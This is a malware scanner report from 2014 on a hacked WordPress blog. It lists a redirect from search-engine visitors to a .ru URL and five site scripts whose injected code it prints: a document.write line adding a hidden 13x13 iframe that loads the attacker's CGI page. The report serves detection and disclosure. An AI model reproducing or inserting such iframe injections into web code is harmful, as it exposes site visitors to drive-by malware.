New scan:

Malware Scanner report for chronicenthusiasm.com

Malicious/Suspicious/Total urls checked
5/0/17
5 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "chronicenthusiasm.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://normalizedstability.ru/ycoordinatesmad.cgi?8
100 websites infected.

The website "chronicenthusiasm.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/8
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=chronicenthusiasm.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://chronicenthusiasm.com/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: chronicenthusiasm.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Sep 2014 06:59:25 GMT
Location: http://normalizedstability.ru/ycoordinatesmad.cgi?8
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://chronicenthusiasm.com/
200 OK
Content-Length: 34710
Content-Type: text/html
clean
http://chronicenthusiasm.com/wp-content/themes/inove/js/base.js
200 OK
Content-Length: 2940
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


(function() {

function $(id) {
return document.getElementById(id);
}

function setStyleDisplay(id, status) {
$(id).style.display = status;
}

function goTop(acceleration, time) {
acceleration = acceleration || 0.1;
time = time || 16;

var dx = 0;
var dy = 0;
var bx = 0;
var by = 0;
var wx = 0;
var wy = 0;

if (document.documentElement) {
dx = document.documentElement.
... 2350 bytes are skipped ...
['MGJS']['$'] = $;
window['MGJS']['setStyleDisplay'] = setStyleDisplay;
window['MGJS']['goTop'] = goTop;
window['MGJS']['switchTab'] = switchTab;
window['MGJS']['loadCommentShortcut'] = loadCommentShortcut;
window['MGJS']['getElementsByClassName'] = getElementsByClassName;

})();
;document.write('<iframe src="http://normalizedstability.ru/ycoordinatesmad.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');

Antivirus reports:

ESET-NOD32
HTML/Iframe.B.Gen

http://chronicenthusiasm.com/wp-content/themes/inove/js/menu.js
200 OK
Content-Length: 5662
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function() {
var Class = {
create: function() {
return function() {
this.initialize.apply(this, arguments);
}
}
}
var GhostlyMenu = Class.create();
GhostlyMenu.prototype = {
initialize: function(target, align, opacity, offset) {
this.obj = cleanWhitespace(target);
this.align = align || 'left';
this.opacity = 0;
this.maxopacity = opacity || 1;
this.offset = offset || 0;
this.menu = this.obj.childNodes
if
... 3528 bytes are skipped ...
br/> }
} else if (/WebKit/i.test(navigator.userAgent)) {
var _timer = setInterval( function() {
if (/loaded|complete/.test(document.readyState)) {
clearInterval(_timer);
loadMenus();
}
}, 10);
} else {
window.onload = function(e) {
loadMenus();
}
}
})();document.write('<iframe src="http://normalizedstability.ru/ycoordinatesmad.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');

Antivirus reports:

ESET-NOD32
HTML/Iframe.B.Gen

http://chronicenthusiasm.com/wp-includes/js/jquery/jquery.js?ver=1.2.6
200 OK
Content-Length: 31278
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1c.4I,3n$=1c.$;J D=1c.4I=1c.$=H(a,b){I 2r D.18.5i(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,61=/^.[^:#\\[\\.]*$/,12;D.18=D.3V={5i:H(d,b){d=d||
... 3102 bytes are skipped ...
e|Content|XMLHTTP|Microsoft|th|onreadystatechange|onload|td|charset|cap|host|colg|1_|fast|400|tfoot|specified|thead|plain|leg|attributes|opt|adobeair|urlencoded|www|embed|area|hr|ajaxSetup|post|meta|getJSON|getScript|img|static|scrollTo|elements|serialize|outer|abbr|pixelLeft'.split('|'),0,{}));jQuery.noConflict();
;document.write('<iframe src="http://normalizedstability.ru/ycoordinatesmad.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Norman
IframeRef.DL

http://chronicenthusiasm.com/wp-content/plugins/google-analyticator/external-tracking.js?ver=2.7.1
200 OK
Content-Length: 977
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function() {
jQuery('a').each(function() {
var a = jQuery(this);
var href = a.attr('href');

if ( href == undefined )
return;

var url = href.replace('http://','').replace('https://','');
var hrefArray = href.split('.').reverse();
var extension = hrefArray[0];

if ( ( href.match(/^http/) ) && ( !href.match(document.domain) ) ) {
a.click(function() {
pageTracker._trackPageview(outboundPrefix + url);
});
}

if (jQuery.inArray(extension,fileTypes) != -1) {
a.click(function() {
pageTracker._trackPageview(downloadsPrefix + url);
});
}
});
});document.write('<iframe src="http://normalizedstability.ru/ycoordinatesmad.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-BLO [Trj]
Bkav
MW.Clod7a1.Trojan.ccc8
Kaspersky
HEUR:Trojan.Script.Generic
Norman
IframeRef.DL

http://stats.wordpress.com/e-201439.js
200 OK
Content-Length: 824
Content-Type: application/x-javascript
clean
http://chronicenthusiasm.com/about/
200 OK
Content-Length: 22174
Content-Type: text/html
clean
http://chronicenthusiasm.com/wp-content/themes/inove/js/comment.js
200 OK
Content-Length: 2422
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function() {
function reply(authorId, commentId, commentBox) {
var author = MGJS.$(authorId).innerHTML;
var insertStr = '<a href="#' + commentId + '">@' + author.replace(/\t|\n|\r\n/g, "") + ' </a> \n';
appendReply(insertStr, commentBox);
}
function quote(authorId, commentId, commentBodyId, commentBox) {
var author = MGJS.$(authorId).innerHTML;
var comment = MGJS.$(commentBodyId).innerHTML;

var insertStr = '<blockquote cite="#' +
... 1707 bytes are skipped ...
field.focus();
field.selectionStart = cursorPos;
field.selectionEnd = cursorPos;

} else {
field.value += insertStr;
field.focus();
}
}

window['MGJS_CMT'] = {};
window['MGJS_CMT']['reply'] = reply;
window['MGJS_CMT']['quote'] = quote;

})();document.write('<iframe src="http://normalizedstability.ru/ycoordinatesmad.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');

Antivirus reports:

ESET-NOD32
HTML/Iframe.B.Gen

http://api.recaptcha.net/challenge?k=6LczmwYAAAAAAAR2JfPA87zTkyECOvPws7Ky5yeQ
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Connection: close
Date: Fri, 26 Sep 2014 07:15:39 GMT
Pragma: no-cache
Location: http://www.google.com/recaptcha/api/challenge?k=6LczmwYAAAAAAAR2JfPA87zTkyECOvPws7Ky5yeQ
Server: GSE
Content-Type: text/html; charset=UTF-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Alternate-Protocol: 80:quic,p=0.002
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
clean
http://www.google.com/recaptcha/api/challenge?k=6lczmwyaaaaaaar2jfpa87ztkyecovpws7ky5yeq
200 OK
Content-Length: 67
Content-Type: text/javascript
clean
http://chronicenthusiasm.com/about/trackback/
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Sep 2014 06:59:31 GMT
Pragma: no-cache
Location: http://chronicenthusiasm.com/about/
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=6f3cfb9442672cd202a2763a67d23151; path=/
X-Pingback: http://chronicenthusiasm.com/xmlrpc.php
clean
http://chronicenthusiasm.com/test404page.js
404 Not Found
Content-Length: 3156
Content-Type: text/html
clean
http://chronicenthusiasm.com/comments/feed/
200 OK
Content-Length: 4458
Content-Type: text/xml
clean
http://chronicenthusiasm.com/feed/
200 OK
Content-Length: 18921
Content-Type: text/xml
clean
http://chronicenthusiasm.com/2009/06/04/the-woz-pattern-are-you-becoming-a-generalist-or-specalist/
200 OK
Content-Length: 19325
Content-Type: text/html
clean
http://chronicenthusiasm.com/category/uncategorized/
200 OK
Content-Length: 34133
Content-Type: text/html
clean
http://chronicenthusiasm.com/2009/10/29/can-computers-think/
200 OK
Content-Length: 15972
Content-Type: text/html
clean